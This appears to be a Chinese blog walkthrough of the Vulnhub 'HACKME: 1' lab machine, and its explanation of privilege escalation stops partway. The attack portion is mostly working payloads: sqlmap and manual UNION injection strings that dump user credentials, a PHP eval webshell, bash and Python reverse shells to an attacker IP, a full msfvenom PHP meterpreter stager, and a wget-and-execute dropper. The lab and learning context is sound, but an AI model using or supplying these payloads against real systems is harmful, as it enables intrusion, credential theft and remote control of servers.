(Vulnhub練習)-- HACKME: 1滲透實戰
文章目錄
- (Vulnhub練習)-- HACKME: 1滲透實戰
- 下載地址
- 掃描主機
- 目標主機IP:192.168.100.134
- 資訊收集
- nmap埠掃描
- 指紋識別
- 路徑掃描
- 開始測驗
- SQL注入
- sqlmap
- 手工注入
- superadmin用戶登錄
- 檔案上傳
- 直接一句話木馬上傳
- 拿到shell(四種方法總結)
- nc_shell反彈shell
- 1.php檔案
- 服務端監聽
- 客戶端實作
- 效果
- nc_python反彈shell
- 1.py檔案
- 服務端監聽
- 客戶端實作
- 效果
- msf_php反彈shell
- msfvenom生成木馬
- 2.php檔案
- php.rc檔案
- 服務端監聽
- 客戶端實作
- 效果
- msf_linux反彈shell
- msfvenom生成木馬
- 3.php檔案
- linux.rc檔案
- 服務端監聽
- 客戶端實作
- 效果
- 提權
- 將shell轉換為互動式的tty
- 在/home/legacy路徑下發現二進制檔案touchmenot
- 原理
下載地址
https://www.vulnhub.com/entry/hackme-1,330/
掃描主機
netdiscover -i eth0 -r 192.168.100.0/24
目標主機IP:192.168.100.134
資訊收集
資訊收集的步驟基本上差不多,可根據工具簡單寫個shell腳本
#!/usr/bin/bash
ip=192.168.100.$1
ping -c2 $ip &>/dev/null
if [ $? -eq 0 ] ; then
echo "$ip is up"
else
echo "$ip is down"
exit
fi
masscan --rate=10000 --ports 0-65535 $ip
masscan --rate=10000 --ports 0-65535 $ip
nmap -A $ip
sleep 30
whatweb $ip
sleep 10
dirsearch -u $ip
sleep 5
nikto -h $ip
sleep 5
dirb http://$ip
我的網段在192.168.100.0/24 所以ip要改改
/home/xiaoxiaoran/shell/xinxi.sh 134
nmap埠掃描
指紋識別
路徑掃描
開始測驗
主頁發現登錄頁面,而且還可以注冊用戶
注冊用戶admin 密碼123456 登錄admin用戶
SQL注入
sqlmap
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch --current-db
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch -D webapphacking --tables
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms --batch -D webapphacking -T users --columns
sqlmap -u http://192.168.100.134/welcome.php --cookie "PHPSESSID=u5eefssue2adhtmid1rnnpj3ui" --forms -D webapphacking -T users -C user,name,pasword --dump
手工注入
//驗證sql注入
Windows OS' and 1=1#
//驗證sql注入
Windows OS' and 1=2#
//判斷欄位數
Windows OS' order by 3#
//判斷欄位數
Windows OS' order by 4#
//判斷顯示位置
-1' union select 1,2,3#
//查看當前資料庫
-1' union select database(),2,3#
//查看webapphacking庫所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
//查看users表中所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
//查看表中user,password
-1' union select group_concat(user),group_concat(pasword),3 from users#
superadmin用戶登錄
用戶名superadmin ,密碼Uncrackable(md5破解的)
檔案上傳
沒有任何限制
直接一句話木馬上傳
<?php @eval($_POST[1]);
路徑在 資訊收集時就有掃到
拿到shell(四種方法總結)
kali ip 為 192.168.100.133
nc_shell反彈shell
1.php檔案
<?php system("echo 'bash -i >& /dev/tcp/192.168.100.133/1234 0>&1' | bash");?>
服務端監聽
nc -nvlp 1234
客戶端實作
上傳 1.php 并訪問
效果
nc_python反彈shell
1.py檔案
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.100.133",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
服務端監聽
nc -nvlp 1234
客戶端實作
蟻劍終端執行 python 1.py
效果
msf_php反彈shell
msfvenom生成木馬
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=8080
2.php檔案
/*<?php /**/ error_reporting(0); $ip = '192.168.100.133'; $port = 8080; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
php.rc檔案
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.100.133
set LPORT 8080
exploit
服務端監聽
msfconsole -qr /home/xiaoxiaoran/shell/php.rc
客戶端實作
上傳 2.php 并訪問
效果
msf_linux反彈shell
msfvenom生成木馬
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/linux_shell
3.php檔案
<?php system("wget 192.168.100.133/linux_shell -O /tmp/xiao3;cd /tmp;chmod +x xiao3;./xiao3 &")?>
linux.rc檔案
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.100.133
set LPORT 4444
exploit
服務端監聽
msfconsole -qr /home/xiaoxiaoran/shell/linux.rc
客戶端實作
上傳 3.php 并訪問
效果
提權
將shell轉換為互動式的tty
python -c 'import pty;pty.spawn("/bin/bash")'
在/home/legacy路徑下發現二進制檔案touchmenot
原理
LINUX中除了r w x 三個權限外(分別代表r 讀,w 寫,x 執行),其實還有兩個特殊的權限s 跟t
當s權限在檔案所有者 x 權限上時,例如:-rwsr-xr-x,此時稱為Set UID,簡稱為SUID的特殊權限,
即當執行該檔案時將具有該檔案所有者的權限
還有一個t權限,Sticky Bit,簡稱為SBIT權限,只針對目錄有效,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/375202.html
標籤:其他
上一篇:ARP欺騙實踐
下一篇:OPENSSL基礎使用